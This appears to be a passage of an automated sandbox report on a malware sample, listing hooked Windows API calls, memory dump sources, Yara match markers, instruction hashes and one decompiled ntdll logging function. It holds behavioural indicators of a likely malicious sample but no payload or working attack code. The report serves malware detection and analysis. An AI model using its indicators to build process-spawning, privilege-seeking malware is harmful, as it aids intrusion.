                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 79d989ff6f6c4c1dc73f22780bd8ab3206f7bfa088aa8ed53e0be610a0d53a9f
                                                                        • Instruction ID: 5e1f945eebfa0c3cf1454ef70a19e868e6377a621a379c3c38e42a2bee56b275
                                                                        • Opcode Fuzzy Hash: 79d989ff6f6c4c1dc73f22780bd8ab3206f7bfa088aa8ed53e0be610a0d53a9f
                                                                        • Instruction Fuzzy Hash: 5F90027220101802F1807159450464A0009D7D1355FA1C059A4056654DCA55DA6A77E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 59a8b51470e02af9695503dca85e7ad4fb756c64d1859321a694dffea8763800
                                                                        • Instruction ID: 143a1a6db88e95c1efbf16365fb739df60a0637e5e8c94ad6eb661565e5d12c3
                                                                        • Opcode Fuzzy Hash: 59a8b51470e02af9695503dca85e7ad4fb756c64d1859321a694dffea8763800
                                                                        • Instruction Fuzzy Hash: 1990027220505842F14071594504A460019D7D0359F61C055A4095694D9665DD66B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 3ba27cfc581e94f53ea851e650f09ed34b49995654109e5958ed07df34bc464e
                                                                        • Instruction ID: 3f8ba48a48b1b78d94d924eed145f7e81dbd98136ba967a642eb5adaf35e78c5
                                                                        • Opcode Fuzzy Hash: 3ba27cfc581e94f53ea851e650f09ed34b49995654109e5958ed07df34bc464e
                                                                        • Instruction Fuzzy Hash: 9A90026221181042F20065694D14B070009D7D0357F61C159A4185554CC955D8726561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5c75215306b562a2a0e559b7d1e40a9c5205b203d0be75cbbce4c45ae2f4c07a
                                                                        • Instruction ID: 81e0ca3b759e5b29d15ff0830f96879ce90cf6c005b5b9e0c7dd20747301823f
                                                                        • Opcode Fuzzy Hash: 5c75215306b562a2a0e559b7d1e40a9c5205b203d0be75cbbce4c45ae2f4c07a
                                                                        • Instruction Fuzzy Hash: 0490026A21301002F1807159550860A0009D7D1256FA1D459A4046558CC955D87A6361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: df1e5ef97ba7081523fe544956595929f15e2b99295eb616ffe64419f7346978
                                                                        • Instruction ID: 24db336790bf8a0156a45ec0ed1cc9924d46d996b6a496e44ca75bc7bfc7e8f1
                                                                        • Opcode Fuzzy Hash: df1e5ef97ba7081523fe544956595929f15e2b99295eb616ffe64419f7346978
                                                                        • Instruction Fuzzy Hash: 5D90027231115402F110615985047060009D7D1255F61C455A4855558D86D5D8A27162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 22a53c363e5231a99c9c78e0b3898e9f1f5fd1311e6b14fafa68e393b4bd1beb
                                                                        • Instruction ID: 80baaeaa99c1d2437712e688d7ae8d2292936a81a81422b22fdae3dc1b152361
                                                                        • Opcode Fuzzy Hash: 22a53c363e5231a99c9c78e0b3898e9f1f5fd1311e6b14fafa68e393b4bd1beb
                                                                        • Instruction Fuzzy Hash: 6690027220101402F100659955086460009D7E0355F61D055A9055555EC6A5D8A27171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

APIs
• Sleep.KERNELBASE(000007D0), ref: 00856F88
Strings
Memory Dump Source
• Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00843B93), ref: 008584FD
Strings
Memory Dump Source
• Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
Uniqueness

Uniqueness Score: -1.00%

APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008472BA
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008472DB
Memory Dump Source
• Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,0084CFA2,0084CFA2,?,00000000,?,?), ref: 00858660
Memory Dump Source
• Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00858594
Memory Dump Source
• Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0084CCD0,?,?), ref: 0085704C
Memory Dump Source
• Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 89b5fcddf5cf94ebe47764815518dfbcb350786f50de0af2faf284d80b108530
                                                                        • Instruction ID: b2834652ce3aeb53a2058b00796fec0c1827a14249fb9b8d0ef2372b1a9f5b23
                                                                        • Opcode Fuzzy Hash: 89b5fcddf5cf94ebe47764815518dfbcb350786f50de0af2faf284d80b108530
                                                                        • Instruction Fuzzy Hash: F2E06D333907043AE630659DAC03FA7B39CDB81B62F540026FA0DEB2C1D595F80642A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0084CFA2,0084CFA2,?,00000000,?,?), ref: 00858660
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: c4c12349f7843d4c95c896aebf4e8b7ec874d9d38be058e0a016e30f42c9c57d
                                                                        • Instruction ID: 72807fcf96565a136822ed37849ff63f4cf6d52fa49229e5fdb3cb0e27c11e67
                                                                        • Opcode Fuzzy Hash: c4c12349f7843d4c95c896aebf4e8b7ec874d9d38be058e0a016e30f42c9c57d
                                                                        • Instruction Fuzzy Hash: 4AF01C75200104ABCB20DF59CCC5EDB77AAEF88350F108655F90997246CA35A8068BE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00853516,?,00853C8F,00853C8F,?,00853516,?,?,?,?,?,00000000,00000000,?), ref: 008584BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction ID: 656494a5013bb87528da2a76b102ace08d92c742f240cfc07fe1bedc9a4c0cb2
                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction Fuzzy Hash: ABE01AB1200204ABD714DF59CC41EA777ACEF88650F114559FE085B241C930F9148AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0084CFA2,0084CFA2,?,00000000,?,?), ref: 00858660
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction ID: 4a34d6b5ba3d0751ad111b47a7f379e5262d0cb7500f09bbef94e2acf9ccfe16
                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction Fuzzy Hash: 8BE01AB1200208ABDB10DF49CC85EE737ADEF88650F018555FE0867241C930E8148BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00847C63,?), ref: 0084D43B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction ID: 11b779664c05767e435adec0e9dc7f4d00f0a015d29a0ed7f5d0bd524ef0a86e
                                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction Fuzzy Hash: 34D0A7727503083BEA10FBA89C03F2633CCAB54B40F494064F949D73C3D960F5004565
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: eac1cd6351ffc4c15705860254355e417f9a758741d9708b81fc1159c58705d4
                                                                        • Instruction ID: c72c7c27cbc493ed042482d026a34c1b5fc2d71d38dbe60f0e912bc84018f3cf
                                                                        • Opcode Fuzzy Hash: eac1cd6351ffc4c15705860254355e417f9a758741d9708b81fc1159c58705d4
                                                                        • Instruction Fuzzy Hash: F9B09BB29015D5C5F711D76047087177904F7D0755F76C095D2060641A4778D091F5B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 53%
                                                                        			E04B6FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                        				void* _t7;
                                                                        				intOrPtr _t9;
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr* _t12;
                                                                        				intOrPtr* _t13;
                                                                        				intOrPtr _t14;
                                                                        				intOrPtr* _t15;
                                                                        
                                                                        				_t13 = __edx;
                                                                        				_push(_a4);
                                                                        				_t14 =  *[fs:0x18];
                                                                        				_t15 = _t12;
                                                                        				_t7 = E04B1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                        				_push(_t13);
                                                                        				E04B65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                        				_t9 =  *_t15;
                                                                        				if(_t9 == 0xffffffff) {
                                                                        					_t10 = 0;
                                                                        				} else {
                                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                        				}
                                                                        				_push(_t10);
                                                                        				_push(_t15);
                                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                        				return E04B65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                        			}

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B6FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B6FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B6FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 60b7d91a8dbe621a53358d60e93ca879052cadad83e790958e9d7112d3fd7cb6
                                                                        • Instruction ID: f98db2bd5f91ef9ff165a131662fb179b28ce51ff62022aa9d8311cfaf44e4ca
                                                                        • Opcode Fuzzy Hash: 60b7d91a8dbe621a53358d60e93ca879052cadad83e790958e9d7112d3fd7cb6
                                                                        • Instruction Fuzzy Hash: FAF0C232640601BBE6201A45EC02F33BF6AEB44730F140294F628565E1EA62B83096A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%